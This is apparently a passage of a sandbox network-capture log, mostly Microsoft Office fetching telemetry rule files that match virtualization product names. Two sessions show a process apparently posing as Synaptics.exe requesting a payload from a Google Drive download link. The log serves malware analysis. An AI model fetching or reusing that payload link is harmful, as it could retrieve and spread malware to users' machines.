                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eicDvJAk6CjekmDBdReZpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        80 | 192.168.2.5 | 49862 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:43 UTC | 192 | OUT | GET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                        x-ms-request-id: f87bd39b-701e-0097-59cc-45b8c1000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bd6ztf6hC1EWRvq2s00000002v000000000vtu0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC | 477 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        81 | 192.168.2.5 | 49865 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:43 UTC | 192 | OUT | GET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                        x-ms-request-id: e55982d9-501e-0047-225f-47ce6c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bd5gpk5hC1EWR8dk40000000100000000000qwt
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC | 419 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        82 | 192.168.2.5 | 49866 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:43 UTC | 192 | OUT | GET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                        x-ms-request-id: 5cfda45f-901e-00ac-3dce-45b69e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bdl6zq5hC1EWRf3ws00000002wg00000000t0ga
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC | 472 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        83 | 192.168.2.5 | 49869 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:44 UTC | 192 | OUT | GET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:44 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                        x-ms-request-id: 2accf417-001e-0014-64cb-455151000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215044Z-1746fd949bdhk6hphC1EWRaw3c000000032g00000000b5fg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:44 UTC | 468 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        84 | 192.168.2.5 | 49870 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:45 UTC | 192 | OUT | GET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 485
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                        ETag: "0x8DC582BB9769355"
                                                                                        x-ms-request-id: 6fdb675e-b01e-0070-05ce-451cc0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bd2cq7chC1EWRnx9g0000000310000000001459
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:45 UTC | 485 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        85 | 192.168.2.5 | 49871 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:45 UTC | 192 | OUT | GET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 411
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989AF051"
                                                                                        x-ms-request-id: f6fadb53-501e-0064-5acb-451f54000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bdjzh7thC1EWR3g6400000003b000000000cv0w
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:45 UTC | 411 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        86 | 192.168.2.5 | 49872 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:45 UTC | 192 | OUT | GET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 470
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                        x-ms-request-id: 8c60988c-801e-00a3-08c1-457cfb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bdfg4slhC1EWR34t0000000036g000000008s74
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:45 UTC | 470 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        87 | 192.168.2.5 | 49873 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:45 UTC | 192 | OUT | GET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB556A907"
                                                                                        x-ms-request-id: 1a0f4f93-001e-0049-61cb-455bd5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bdhk6hphC1EWRaw3c0000000330000000009ndd
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:45 UTC | 427 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        88 | 192.168.2.5 | 49879 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:46 UTC | 192 | OUT | GET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:46 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 502
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                        x-ms-request-id: b51b559c-801e-008c-7fcc-457130000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215046Z-1746fd949bdjzh7thC1EWR3g6400000003ag00000000eykz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:46 UTC | 502 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        89 | 192.168.2.5 | 49882 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4kvOtwg_gyjmwhGW7-HSCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        90 | 192.168.2.5 | 49883 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-59D4rKZxQKgW-QrRWmxr_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        91 | 192.168.2.5 | 49884 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:47 UTC | 192 | OUT | GET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:47 UTC | 471 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                        x-ms-request-id: 7bbb8e32-501e-000a-415f-470180000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bd5gpk5hC1EWR8dk400000000yg000000003s4v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:47 UTC | 407 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        92 | 192.168.2.5 | 49885 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:47 UTC | 192 | OUT | GET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:47 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                        x-ms-request-id: 859db5fc-901e-005b-23cb-452005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bd77mkmhC1EWR5efc00000003n00000000060v8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:47 UTC | 474 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        93 | 192.168.2.5 | 49886 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:47 UTC | 192 | OUT | GET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:48 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                        x-ms-request-id: bcf9f347-101e-007a-60d2-45047e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bd77mkmhC1EWR5efc00000003m000000000932r
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:48 UTC | 469 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        94 | 192.168.2.5 | 49887 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:47 UTC | 192 | OUT | GET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
2024-12-05 21:50:48 UTC  470                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                        x-ms-request-id: 68175a90-d01e-0065-3ed1-45b77a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bdxk6n6hC1EWRdr8c000000032g00000000pzcm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
2024-12-05 21:50:48 UTC  408                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID  Source IP    Source Port  Destination IP  Destination Port
95          192.168.2.5  49888        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-12-05 21:50:48 UTC  192                OUT        GET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
2024-12-05 21:50:48 UTC  470                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:48 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                        x-ms-request-id: 2aa810bc-801e-008f-63c1-452c5d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215048Z-1746fd949bddgsvjhC1EWRum2c00000003hg00000000gfra
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
2024-12-05 21:50:48 UTC  416                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session ID  Source IP    Source Port  Destination IP  Destination Port
96          192.168.2.5  49890        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-12-05 21:50:49 UTC  192                OUT        GET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
2024-12-05 21:50:49 UTC  470                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                        x-ms-request-id: 26f79bf1-901e-0083-7ec4-45bb55000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bdfg4slhC1EWR34t0000000038g000000000he2
                                                                                        x-fd-int-roxy-purgeid: 0
